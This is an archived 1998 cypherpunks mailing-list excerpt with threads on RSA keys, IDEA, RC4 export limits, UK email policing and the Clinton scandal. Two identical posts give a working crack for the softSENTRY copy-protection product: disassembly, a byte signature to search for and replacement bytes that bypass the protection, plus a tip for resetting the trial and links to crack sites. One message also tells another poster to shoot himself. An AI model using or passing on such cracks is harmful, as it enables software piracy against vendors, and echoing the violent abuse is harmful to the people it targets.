that even if the attacker manages to factor n but not n' the attacker
can't prove that there isn't another public key (n'',e'') which is the
real key which signed the message.  Ie the reason the attacker is
unable to factor (n',e') may be either because it is a multiple of two
512 bit primes, or because it is a mutliple of primes of special form
I quoted a post describing in the other post, and he doesn't have
enough compute to recover it.  With the quoted algorithm from Maurer,
the attacker needs more compute to show that the key has a special
form than you do to create the key.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Sat, 19 Sep 1998 18:50:23 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Clinton's fake apologies (fwd)
In-Reply-To: <19980919212126.20210.qmail@hades.rpini.com>
Message-ID: <3.0.5.32.19980920095224.0086a600@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 09:21 PM 9/19/98 -0000, Anonymous wrote:
>
>What? To tell a lie is one thing, but if you preface it with "I'm telling
the truth",
>then that is really really bad? I still think you're drawing a very fine
line.
>
>I'm honoured to draw an ad hominem before revealing that I'm on AOL.
>
>-- an anonymous aol32 user. 
>

It was prefaced with "...to tell the truth, the whole truth, and nothing
but the truth...".
Straighten out your head, you seem to be a few neurons short of a
functional synapse.

Reeza!

	The world was on fire,,, but no one could save me but you...
		Strange what desire ,,will make foolish people do.....
			(to the back beat)
				This world is only gonna break your heart....
					==C.I.==




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Neels Kriek" <kriek@bigfoot.com>
Date: Sun, 20 Sep 1998 11:26:30 +0800
To: <cypherpunks@cyberpass.net>
Subject: Re: "Bioarmageddon"
Message-ID: <000201bde4b3$afdb36a0$8a060cd1@alien>
MIME-Version: 1.0
Content-Type: text/plain



Just read "The Cobra Event"by the author of "The Hot Zone"  Although mostly
fiction it makes for some very scary reading.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 20 Sep 1998 09:18:22 +0800
To: Robert Hettinga <cypherpunks@cyberpass.net
Subject: Re: IP: Tougher laws are sought to seize cash
In-Reply-To: <v0401172fb22954e840e2@[139.167.130.247]>
Message-ID: <199809201420.KAA06590@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



>It now is illegal to try to leave the country with more
>than $10,000 in currency without reporting it to U.S.
>Customs officials. Violations are punishable by up to
>five years in prison and seizure of the money. But in
>June, the U.S. Supreme Court dealt a serious blow
>to efforts to seize the unreported cash, ruling in a
>precedent-setting case that such seizures often
>violate constitutional protections against "excessive
>fines."

Here's the case:

http://laws.findlaw.com/US/000/96-1487.html

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Sun, 20 Sep 1998 10:37:42 +0800
To: cypherpunks@cyberpass.net
Subject: Alleged IDEA(tm) Weakness
In-Reply-To: <199809200308.NAA12805@avalon.qualcomm.com>
Message-ID: <199809201540.KAA25520@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain




> I think this is wrong. It claims that the problem
> in IDEA comes from the bias of the multiplication
> operation... but the multiply in IDEA is over the
> integers modulo 65537, with the 0 value
> representing 65536, not 0...  this is in fact an
> unbiased operation. However I have not attempted
> to verify the rest of the logic.

Correct, multiplication by a non-zero residue modulo 65537 is a
permutation of the non-zero residues.  The central notion behind IDEA is
to use this operation, which can be expressed expeditiously in terms of
the unsigned 16x16->32 multiply, as a builtin wide S-Box.  This is how
IDEA manages to do strong encryption using only a few ordinary arithmetic
and logical instructions with no necessity for table lookup.

I didn't bother to read the rest of the rant. 

-- 
Sponsor the DES Analytic Crack Project
http://www.cyberspace.org/~enoch/crakfaq.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 20 Sep 1998 10:34:40 +0800
To: cypherpunks@cyberpass.net
Subject: CJ's Teeth Busted
Message-ID: <199809201536.LAA12406@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Forwarded:

Relatives report that Jeff Gordon busted CJ's teeth, which
is why CJ was picked up, not for his wasted carcass, but
for the the cutting edge incisors being hosted and packed 
around North America like suitcase nukes. The teeth 
allegedly hold the secrets of why everyone except the 
FBI wanted CJ.

Jeff sent them to a LANL for DNA mouthwash decrypt for
whatever CJ did to whoever to social engineer access to 
Motorola's algorithm's for transmitting DEFCON 1.

Which means us .mil Totos got to go to the backup plan 
for richocheting/encrypting/mixing signals to the sats. 
Anyone forget where it is, send me a msg with the PK

   http://calvo.teleco.ulpgc.es/listas/cypherpunks@infonex.com/

Search Heavenly Gate/Cypherpunks/Waco+CJ Parker..

The word on the IC Net (see above URL) is that the teeth are 
rigged to resist for no more than twenty days under pressure 
of counterterrorism's bite. Then they bark Semtext: fucking
jerks, then go nuclear. Monday is a key tumbler click.

More, there's a forwarded report from the alleged CJ that he 
spit in the eye of the T-man, wrote "Helter Skelter" on the cell 
mirror with his blood, and then, slow chewing a turd, ostentatiously 
peeked up the lady magistrate's Victoria Secrets, for which 
she brazen-hussily ordered him to forthwith gaze up this: MO.

Toto@AOL.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Rose <ggr@qualcomm.com>
Date: Sat, 19 Sep 1998 22:16:49 +0800
To: coderpunks@toad.com
Subject: Re: Repost in text: IDEA(tm) weakness
In-Reply-To: <199809200116.DAA28107@replay.com>
Message-ID: <199809200308.NAA12805@avalon.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain



I think this is wrong. It claims that the problem
in IDEA comes from the bias of the multiplication
operation... but the multiply in IDEA is over the
integers modulo 65537, with the 0 value
representing 65536, not 0...  this is in fact an
unbiased operation. However I have not attempted
to verify the rest of the logic.

Anonymous writes:
     
>   Is IDEA secure ?
>   
>     The IDEA algorithm (patented by ASCOM) is the core algorithmm used
>     in PGP. It is based on a rotating 128 bit key split into 16 bit
>     segments. The algorthm converts 64 bits of data at a time using the
>     following operations '+', '^' (exclusive-or) and '*'.
>     
>     The formulas are :
>     
>[...]
>     
>     Given a large random data message (ie 1000 samples - 64*1000 = 8Kb
>     file). The distribution of the above operations can be used to
>     break the key. ie both the '+' and the '^' operations give an even
>     distribution but the '*' operator gives a biased distribution
>     towards '0'.
     
Greg Rose                                     INTERNET: ggr@qualcomm.com
QUALCOMM Australia        VOICE:  +61-2-9181 4851   FAX: +61-2-9181 5470
Suite 410, Birkenhead Point              http://people.qualcomm.com/ggr/ 
Drummoyne NSW 2047      B5 DF 66 95 89 68 1F C8  EF 29 FA 27 F2 2A 94 8F







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sun, 20 Sep 1998 15:19:50 +0800
To: John Young <jya@pipeline.com>
Subject: Re: CJ Update
In-Reply-To: <199809200148.VAA28141@camel7.mindspring.com>
Message-ID: <Pine.GSO.3.95.980920131754.12842I-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



I've received two messages from Carl Johnson in letter form. He seems in,
um, good spirits. He also mentions a BabyTruthMongerel at one point. 

He asks that his messages be passed on to cypherpunks, and I have no
objection, after I'm done writing the fourth part of the article. We could
presumably scan them in and put them up on pathfinder.com.

-Declan



On Sat, 19 Sep 1998, John Young wrote:

> >From Alia Johnson <lodi@well.com>, CJ's sister, today:
> 
> I'm writing to say that CJ has arrived at the Springfield Medical
> Referral Center, where he will be held for a month or more (the 
> phone says U.S.  Medical Center for Federal Prisoners) for 
> "examination". 
> 
> Here is the address:  
> 
>             Carl E. Johnson
> 			Register # 05987-196
>              U.S. Medical Center for Federal Prisoners
> 	          P.O. Box 4000
>              Springfield, Missouri  65801
> 
> Also, to my delight, I received a letter from him today. He sounds okay.
> 
> CJ in his letter asks for physical mailing addresses for some of the
> cypherpunks (no one specifically) so that he can send you things to 
> post since I will be travelling.
> 
> [End Alia]
> 
> ---------
> 
> We'll be happy to digitize and/or post any mail from CJ folks want to 
> share, anonymous and/or encrypted always welcome:
> 
> Fax: 212-799-4003
> Vox: 212-873-8700
> 
> Snail:
> 
> John Young
> 251 West 89th Steet, Suite 6E
> New York, NY 10024
> 
> We've put all our PGP keys at: 
> 
>    http://jya.com/jya-keys.txt
> 
> And a bunch of keys for the wild bunch of Totos:
> 
>    http://jya.com/totos-keys.htm
> 
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sun, 20 Sep 1998 14:20:43 +0800
To: Steve Mynott <stevem@tightrope.demon.co.uk>
Subject: Re: uk police and warrents
In-Reply-To: <19980920152951.A29686@tightrope.demon.co.uk>
Message-ID: <199809201922.PAA09395@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <19980920152951.A29686@tightrope.demon.co.uk>, on 09/20/98 
   at 03:29 PM, Steve Mynott <stevem@tightrope.demon.co.uk> said:

>The UK police are pushing for access to people's email _without_ having a
>warrent.

>THey also want the ISPs to store everyone's mail for a week..

Encrypt everything and let them keep it as long as they want. :)

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: OS/2: Your brain.  Windows: Your brain on drugs.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNgVX3I9Co1n+aLhhAQH1UwQArvMflQ5BzBFFMWi4s/7u4NCf0v1dl6Id
SBvbGf3kZA4E1MAZ7Ry/UQucrVBuLmvU2VQBQyj8D2sILPzRUYySVUY8lzi7M8CB
kwY2Df5RFqa9m55aSvfAfaDCugzbZY5Rc2ImLfBVSAS1GDLpUUyhna5Oo3FtU482
pMYsvUAxtCY=
=QPHH
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sun, 20 Sep 1998 15:15:58 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: Questions for Magaziner?
In-Reply-To: <36041E82.F4F072ED@netscape.com>
Message-ID: <199809202012.QAA10139@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <36041E82.F4F072ED@netscape.com>, on 09/19/98 
   at 04:13 PM, Tom Weinstein <tomw@netscape.com> said:

>> Arnold G. Reinhold wrote:
>>
>> One question I'd like asked is whether the US Gov will approve 56-bit RC-4
>> for export on the same terms as 56-bit DES. That would allow export
>> versions of web browsers to be upgraded painlessly, making international
>> e-commerce 64 thousand times more secure than existing 40-bit browsers.
>> (56-bit DES browsers would require every merchant to upgrade their SSL
>> servers and introduce a lot of unneeded complexity.)

>Actually, it wouldn't be any easier to deploy 56-bit RC4 than DES. 
>Either would require roughly the same changes to both clients and
>servers.

I'm sorry but I must be missing something here ...

Why not just use products that have strong crypto without GAK? What is the
point of using this weak junk when one does not have to??

- -- 

http://www.pgpi.com   -- Strong secure e-mail encryption
http://www.opera.com  -- Opera web browser with strong crypto & no back doors
http://www.apache.org -- Most popular Http server on the Internet
http://www.ssleay.org -- Free strong SSL library that can be used with the Apache server.


Then we have the usauly suspects:

http://www.jya.com/nscp-foia.htm -- Netscape's GAK plans.
http://www.kra.org               -- KRAP gang.


- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: Bugs come in through open Windows.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNgVjmo9Co1n+aLhhAQH3NwQAoKla/hjuDRnaUaQ6AgvmI1XRk9rEFQzs
1hFEX5gTqhi/3V/iMRlP4WfJKT6tfQMLae7vL8wNtKzXwqElWZHXxONb8wIoITfH
sQlsE0bnKLAjyYtNc0v1MwSO/oKf1j7Npy8wOZowAxb0lcQNRsQJmOy3h620LLHO
Q0mxf/hhmGs=
=y4X/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Arnold G. Reinhold" <reinhold@world.std.com>
Date: Sun, 20 Sep 1998 14:15:03 +0800
To: dcsb@ai.mit.edu
Subject: Re: Questions for Magaziner?
Message-ID: <v03130301b22abea15c89@[24.128.118.53]>
MIME-Version: 1.0
Content-Type: text/plain



>> Arnold G. Reinhold wrote:
>>
>> One question I'd like asked is whether the US Gov will approve 56-bit RC-4
>> for export on the same terms as 56-bit DES. That would allow export
>> versions of web browsers to be upgraded painlessly, making international
>> e-commerce 64 thousand times more secure than existing 40-bit browsers.
>> (56-bit DES browsers would require every merchant to upgrade their SSL
>> servers and introduce a lot of unneeded complexity.)
>
>Actually, it wouldn't be any easier to deploy 56-bit RC4 than DES.  Either
>would require roughly the same changes to both clients and servers.
>

I was under the impression that 40-bit RC4 was accomplished by revealing 88
bits of the 128-bit key in a header. If a new 56-bit-RC4 browser was
implimented by setting16 of those 88 bits to zero, would any existing
server know the difference? If not, you would get an immediate improvement
in security, at least for browser to server messages, without waiting for
the servers to be upgraded.

No doubt I am missing something, but what?

Arnold





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Sun, 20 Sep 1998 00:23:22 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Clinton's fake apologies (fwd)
In-Reply-To: <19980920032435.24227.qmail@hades.rpini.com>
Message-ID: <3.0.5.32.19980920152605.0086ba30@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 03:24 AM 9/20/98 -0000, Anonymous wrote:
>
>I agree it's bad. I agree it undermines the justice system a little bit.
>But, ... impeachment?
>
>You're not charging him with murder (eg WACO), attacking the 1st
ammendment (CDA),
>the 4th (SSN on driver's licences), the 5th (GAK). You're going after Al
Capone
>for tax evasion. You want to get him because he's a Bad Person not because of
>the particular crime. This is ironic, because his crimes against our basic
>rights were committed while pursuing Bad People, but it is also hypocritical.
>

I could care less if he had an affair, personally. But he had an affair
with a subordinate in his direct employ. When CEO's do that, they get
ostracized. I'm in the military. If I did that, I'd be on the carpet seeing
the Ol' Man, perhaps even court martial, and then out of the military. And
this is the example set by my Commander in Chief???
Many other presidents have had affairs while in office, starting with G.
Washington himself. The difference is, they exercised better judgement and
discretion re: who the affair was with, when and where it was consumated.
Certainly the CIC is projecting a bad image, certainly it is his business
if he has an affair, but when he does it in such a manner that it becomes
front page material in every newspaper around the world, there is something
terribly, desperately wrong.

In case you hadn't noticed, the investigation of him, vis-a-vis the rules
established by other demicans, his supposed compatriates, is still ongoing. 

Methinks this is just the tip of the iceberg, a bone for the populace to
chew on so that when the rest of the story breaks, we (the dog) won't
notice the prime rib and sirloin.

I congratulate you for your defense of a person who demonstrably has broken
his marriage vows, his oath of public office, and purjured himself while
under an additional oath in a court of law.

You, too, are a few neurons short of a functional synapse.

I suggest you discuss it with the maker. The best way is large caliber
bullet at sufficient velocity to penetrate and exit the cranial cavity.

God speed, you fucking idiot.

Reeza!

	The world was on fire,,, but no one could save me but you...
		Strange what desire ,,will make foolish people do.....
			(to the back beat)
				This world is only gonna break your heart....
					==C.I.==




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <stevem@tightrope.demon.co.uk>
Date: Sun, 20 Sep 1998 09:30:45 +0800
To: cypherpunks <cypherpunks@cyberpass.net>
Subject: uk police and warrents
Message-ID: <19980920152951.A29686@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



The UK police are pushing for access to people's email _without_
having a warrent.

THey also want the ISPs to store everyone's mail for a week..

-- 
pgp 1024/D9C69DF9 1997/10/14 steve mynott <steve@tightrope.demon.co.uk>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip Hallam-Baker" <hallam@ai.mit.edu>
Date: Sun, 20 Sep 1998 14:35:42 +0800
To: "Arnold G. Reinhold" <dcsb@ai.mit.edu>
Subject: RE: Questions for Magaziner?
In-Reply-To: <v03130301b22abea15c89@[24.128.118.53]>
Message-ID: <000101bde4ce$31382180$bf011712@games>
MIME-Version: 1.0
Content-Type: text/plain



> I was under the impression that 40-bit RC4 was accomplished by
> revealing 88
> bits of the 128-bit key in a header. If a new 56-bit-RC4 browser was
> implimented by setting16 of those 88 bits to zero, would any existing
> server know the difference? If not, you would get an immediate improvement
> in security, at least for browser to server messages, without waiting for
> the servers to be upgraded.
>
> No doubt I am missing something, but what?

No, that won't work. One side is set to check that the bits it
decrypts match the ones sent in the clear. If they don't match it
rejects them.

There is a problem with the deployed browser base either way :-(.
There is no real difficulty in reducing the number of bits
exposed from 88 to 72 however.

Certainly 56bit RC4 would be preferrable to 56bit DES for most
people at this point since it is unlikely that the EFF will invest
another $250K in proving the same point again for RC4 while the
plans for a DES cracker are now published in a book. If the
government won't allow security, we are back at the stage of
setting up the best obstacles we are allowed rather than
establishing barriers.


There is very good reason to deny the FBI wiretap powers. The FBI
is now back into the type of political investigations it did under
Hoover. It is investigating the question of who gave Salon magazine
information that discredits Mr Hyde despite the fact that there is
no evidence it came from the alledged source and even if there was
discrediting a Congressman is not illegal.


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <stevem@tightrope.demon.co.uk>
Date: Sun, 20 Sep 1998 09:44:25 +0800
To: Tom Weinstein <reinhold@world.std.com>
Subject: Re: Questions for Magaziner?
In-Reply-To: <v03130304b227b7401a3a@[24.128.118.53]>
Message-ID: <19980920154227.B29686@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, Sep 19, 1998 at 02:13:39PM -0700, Tom Weinstein wrote:
> > Arnold G. Reinhold wrote:
> >
> > One question I'd like asked is whether the US Gov will approve 56-bit RC-4
> > for export on the same terms as 56-bit DES. That would allow export
> > versions of web browsers to be upgraded painlessly, making international
> > e-commerce 64 thousand times more secure than existing 40-bit browsers.
> > (56-bit DES browsers would require every merchant to upgrade their SSL
> > servers and introduce a lot of unneeded complexity.)
> 
> Actually, it wouldn't be any easier to deploy 56-bit RC4 than DES.  Either
> would require roughly the same changes to both clients and servers.

Not easier technically but "easier" maybe politically.

Key length seems to be held (probably wrongly) as a rough measure
of crypto "strength" by journos and those in power.

40bit RC4 is weak.  How strong would 56bit RC4 be?

-- 
pgp 1024/D9C69DF9 1997/10/14 steve mynott <steve@tightrope.demon.co.uk>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qweasd123@my-dejanews.com
Date: Sun, 20 Sep 1998 11:27:27 +0800
To: cypherpunks@toad.com
Subject: WARNING: softSENTRY is a SCAM
Message-ID: <199809201619.LAA25486@x11.dejanews.com>
MIME-Version: 1.0
Content-Type: text/plain



Windows developers, DO NOT purchase 20/20 Software's outrageously priced
($695) softSENTRY utility. The package IS A SCAM. Before reading the below
document I found on the Web, understand that DLL- and component-based copy
protection systems are inherently easy to crack. (softSENTRY incorporates a
DLL-based protection as one of its options, in addition to direct .exe
"protection".) Also understand that utilities such as Shrinker and WWPack are
only useful for compression, NOT protection from reverse engineering.
EXE-compressors are notorious for being easy to crack.

Do you want me to convince you?

http://209.44.62.170/pir8/files/ak.html provides cracks for Vbox, SalesAgent,
softSENTRY, TimeLock, and many other copy protection schemes. (Yes, the much
overbloated Vbox is now WORTHLESS as a copy protection system.)

For cracks of just about any EXE-compressor/encryptor you can think of
(including WWPack32, Protect!, and Shrinker), visit
http://www.nettaxi.com/citizens/caligo/main.htm.

Yes, you can also forget about using Shrinker or WWPack to protect your app's
code. They are both absolutely WORTHLESS in that respect as well. Cracks for
them are now everywhere on the Web.

-----------------------
e-mail: LSD-LSD@usa.net
-----------------------

Hello out there. I am somewhat of a newbie at cracking (with some knowledge
of assembly) but thought I'd try my luck at a commercial protection scheme
for one of my first cracks.

I will show you how to crack an extremely stupid, ready-made protection
scheme, softSENTRY 2.07 from 20/20 Software. Download the trial version
(itself extremely easy to crack) from http://www.twenty.com/pgs/dlidx.html.

This software allows zombie programmers (who, IMHO, do not deserve to be
called programmers if they have fallen for this disgustingly bogus
protection) to "automatically" convert their FULL programs to "protected"
trial versions. Sounds like a snake oil vendor, right? It is precisely that:
bogus commercialism at its very best. (This crappy, $695 piece of junk really
is worth only ten bucks. I have encountered far better utilities priced five
times less.)

Okay, what tools do we need to crack softSENTRY?

- Numega's Soft-Ice
- a good hex-editor

I will not show you how to crack the demo of softSENTRY, because the process
is boringly easy to do. (Do it youself! Tip: Delete c:\windows\system\ss.drv
and the "magic key" located at HKEY_CLASSES_ROOT\{XXXXXXXXXX} to restore the
trial period.) I shall, however, show how to murder its weak protection
scheme! (By the way, the fact that softSENTRY's own protection is so weak
indicates a lot about the quality of the product itself!!)

Prepare a test target by protecting some small program like Notepad in order
to disassemble the process and watch how softSENTRY "works". For disassembly,
we will utilize SoftIce because W32Dasm89 seemed to crash when I attempted to
load the target. The protected file and the original file have different
sizes. "Clever", you would have thought, as I did, "Maybe there's some
encryption and variable random protection scheme inside the target." Well,
you're in for quite a surprise. Now hold your breath; THIS IS THE ENTRY POINT
FOR ALL PROTECTED FILES:

:004B066F CC             int    03
:004B0670 55             push   ebp
:004B0671 8BEC           mov    ebp,esp
:004B0673 83EC48         sub    esp,00000048
:004B0676 53             push   ebx
:004B0677 56             push   esi
:004B0678 57             push   edi
:004B0679 E950000000     jmp    004B06CE ; This is a very strange jump,
wouldn't you say?
:004B067E 0000           add    [eax],al
:004B0680 7006           jo     004B0688

All protected files possess the same pattern, with the exact same JMP (coded
as E950000000)! This is very fortunate for us; it means that searching any
"protected" file for the pattern { 55 8B EC 83 EC 48 53 56 57 E9 50 00 00 00
} will give us the entry point of the program and indicate to us that the
program has been "protected" with softSENTRY! (Has your jaw hit the floor
yet?) Yes, softSENTRY is very silly. The very insolent JMP 004B06CE points
the EIP to the actual protection routine. The routine then jumps depending on
the "protection" scheme the programmer specified for use: time limit, splash,
etc. Read carefully:

 00093C82: 8B4508       mov    eax,[ebp][00008]	;
 00093C85: 50           push   eax		;
 00093C86: 68A0324B00   push   004B32A0		;
 00093C8B: FF156C744B00 call   [0004B746C]    	;
 00093C91: E88A000000   call   001279B1		;THIS CALL LOADS THE RESOURCES
OF THE MAIN PROGRAM!
 00093C96: E825000000   call   00127956		;THIS CALL WILL RUN THE MAIN
PROGRAM!
 00093C9B: 8B45B8       mov    eax,[ebp][0FFB8]	;
						;
 00093C9E: 50           push   eax	  	;
 00093C9F: FF15E4734B00 call   [0004B73E4] 	;

(If the protection fails, you will land at 00093C9B.)

The two calls at 00093C91 and 00093C96 load the FULL program completely free
of all nag, splash, time-limit, etc. functions that have been chosen.

If you compare the above source with any other "protected" program, you will
see that both calls are ALWAYS coded as:

E8 8A 00 00 00 E8 25 00 00 00
1st Call       2nd Call

Now we can write a general crack for this amazingly retarded protection
scheme. Simply replace the first jump (coded as E950000000) with the code of
the two calls, which, again, is always E88A000000 E825000000.

1) Search for: { 55 8B EC 83 EC 48 53 56 57 E9 50 00 00 00 }
               			            ^^^^^^^^^^^^^^ (This is the jump.)

2) Replace it with E8A2040000 E83D040000.

Note that the two calls have been recalculated accordingly but remain the
same. (Track them with your debugger!)

So, cracking a softSENTRY-"protected" application is only a matter of
switching a few bytes. I certainly wouldn't pay $695 for some silly
"protection" that took me only 10 minutes to crack!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qweasd123@my-dejanews.com
Date: Sun, 20 Sep 1998 11:27:29 +0800
To: comp-lang-pascal-delphi-announce@moderators.isc.org
Subject: WARNING: softSENTRY is a SCAM
Message-ID: <6u39v4$89r$1@nnrp1.dejanews.com>
MIME-Version: 1.0
Content-Type: text/plain



Windows developers, DO NOT purchase 20/20 Software's outrageously priced
($695) softSENTRY utility. The package IS A SCAM. Before reading the below
document I found on the Web, understand that DLL- and component-based copy
protection systems are inherently easy to crack. (softSENTRY incorporates a
DLL-based protection as one of its options, in addition to direct .exe
"protection".) Also understand that utilities such as Shrinker and WWPack are
only useful for compression, NOT protection from reverse engineering.
EXE-compressors are notorious for being easy to crack.

Do you want me to convince you?

http://209.44.62.170/pir8/files/ak.html provides cracks for Vbox, SalesAgent,
softSENTRY, TimeLock, and many other copy protection schemes. (Yes, the much
overbloated Vbox is now WORTHLESS as a copy protection system.)

For cracks of just about any EXE-compressor/encryptor you can think of
(including WWPack32, Protect!, and Shrinker), visit
http://www.nettaxi.com/citizens/caligo/main.htm.

Yes, you can also forget about using Shrinker or WWPack to protect your app's
code. They are both absolutely WORTHLESS in that respect as well. Cracks for
them are now everywhere on the Web.

-----------------------
e-mail: LSD-LSD@usa.net
-----------------------

Hello out there. I am somewhat of a newbie at cracking (with some knowledge
of assembly) but thought I'd try my luck at a commercial protection scheme
for one of my first cracks.

I will show you how to crack an extremely stupid, ready-made protection
scheme, softSENTRY 2.07 from 20/20 Software. Download the trial version
(itself extremely easy to crack) from http://www.twenty.com/pgs/dlidx.html.

This software allows zombie programmers (who, IMHO, do not deserve to be
called programmers if they have fallen for this disgustingly bogus
protection) to "automatically" convert their FULL programs to "protected"
trial versions. Sounds like a snake oil vendor, right? It is precisely that:
bogus commercialism at its very best. (This crappy, $695 piece of junk really
is worth only ten bucks. I have encountered far better utilities priced five
times less.)

Okay, what tools do we need to crack softSENTRY?

- Numega's Soft-Ice
- a good hex-editor

I will not show you how to crack the demo of softSENTRY, because the process
is boringly easy to do. (Do it youself! Tip: Delete c:\windows\system\ss.drv
and the "magic key" located at HKEY_CLASSES_ROOT\{XXXXXXXXXX} to restore the
trial period.) I shall, however, show how to murder its weak protection
scheme! (By the way, the fact that softSENTRY's own protection is so weak
indicates a lot about the quality of the product itself!!)

Prepare a test target by protecting some small program like Notepad in order
to disassemble the process and watch how softSENTRY "works". For disassembly,
we will utilize SoftIce because W32Dasm89 seemed to crash when I attempted to
load the target. The protected file and the original file have different
sizes. "Clever", you would have thought, as I did, "Maybe there's some
encryption and variable random protection scheme inside the target." Well,
you're in for quite a surprise. Now hold your breath; THIS IS THE ENTRY POINT
FOR ALL PROTECTED FILES:

:004B066F CC             int    03
:004B0670 55             push   ebp
:004B0671 8BEC           mov    ebp,esp
:004B0673 83EC48         sub    esp,00000048
:004B0676 53             push   ebx
:004B0677 56             push   esi
:004B0678 57             push   edi
:004B0679 E950000000     jmp    004B06CE ; This is a very strange jump,
wouldn't you say?
:004B067E 0000           add    [eax],al
:004B0680 7006           jo     004B0688

All protected files possess the same pattern, with the exact same JMP (coded
as E950000000)! This is very fortunate for us; it means that searching any
"protected" file for the pattern { 55 8B EC 83 EC 48 53 56 57 E9 50 00 00 00
} will give us the entry point of the program and indicate to us that the
program has been "protected" with softSENTRY! (Has your jaw hit the floor
yet?) Yes, softSENTRY is very silly. The very insolent JMP 004B06CE points
the EIP to the actual protection routine. The routine then jumps depending on
the "protection" scheme the programmer specified for use: time limit, splash,
etc. Read carefully:

 00093C82: 8B4508       mov    eax,[ebp][00008]	;
 00093C85: 50           push   eax		;
 00093C86: 68A0324B00   push   004B32A0		;
 00093C8B: FF156C744B00 call   [0004B746C]    	;
 00093C91: E88A000000   call   001279B1		;THIS CALL LOADS THE RESOURCES
OF THE MAIN PROGRAM!
 00093C96: E825000000   call   00127956		;THIS CALL WILL RUN THE MAIN
PROGRAM!
 00093C9B: 8B45B8       mov    eax,[ebp][0FFB8]	;
						;
 00093C9E: 50           push   eax	  	;
 00093C9F: FF15E4734B00 call   [0004B73E4] 	;

(If the protection fails, you will land at 00093C9B.)

The two calls at 00093C91 and 00093C96 load the FULL program completely free
of all nag, splash, time-limit, etc. functions that have been chosen.

If you compare the above source with any other "protected" program, you will
see that both calls are ALWAYS coded as:

E8 8A 00 00 00 E8 25 00 00 00
1st Call       2nd Call

Now we can write a general crack for this amazingly retarded protection
scheme. Simply replace the first jump (coded as E950000000) with the code of
the two calls, which, again, is always E88A000000 E825000000.

1) Search for: { 55 8B EC 83 EC 48 53 56 57 E9 50 00 00 00 }
               			            ^^^^^^^^^^^^^^ (This is the jump.)

2) Replace it with E8A2040000 E83D040000.

Note that the two calls have been recalculated accordingly but remain the
same. (Track them with your debugger!)

So, cracking a softSENTRY-"protected" application is only a matter of
switching a few bytes. I certainly wouldn't pay $695 for some silly
"protection" that took me only 10 minutes to crack!

-----== Posted via Deja News, The Leader in Internet Discussion ==-----
http://www.dejanews.com/rg_mkgrp.xp   Create Your Own Free Member Forum




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 20 Sep 1998 16:35:05 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: atheism (was: RE: Democracy... (fwd)) (fwd)
Message-ID: <199809202202.RAA14798@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: pjm@spe.com
> Date: Sun, 20 Sep 1998 20:13:38 +0200
> Subject: atheism (was: RE: Democracy... (fwd)) (fwd)

>      Personal philosophies are a superset of personal religious
> beliefs.  Personal philosophies that include the concept of a god are
> clearly religious in nature.  Personal philosophies that include the
> concept of "faith" are probably religious in nature.  Personal
> philosophies that include the concepts of empirical evidence,
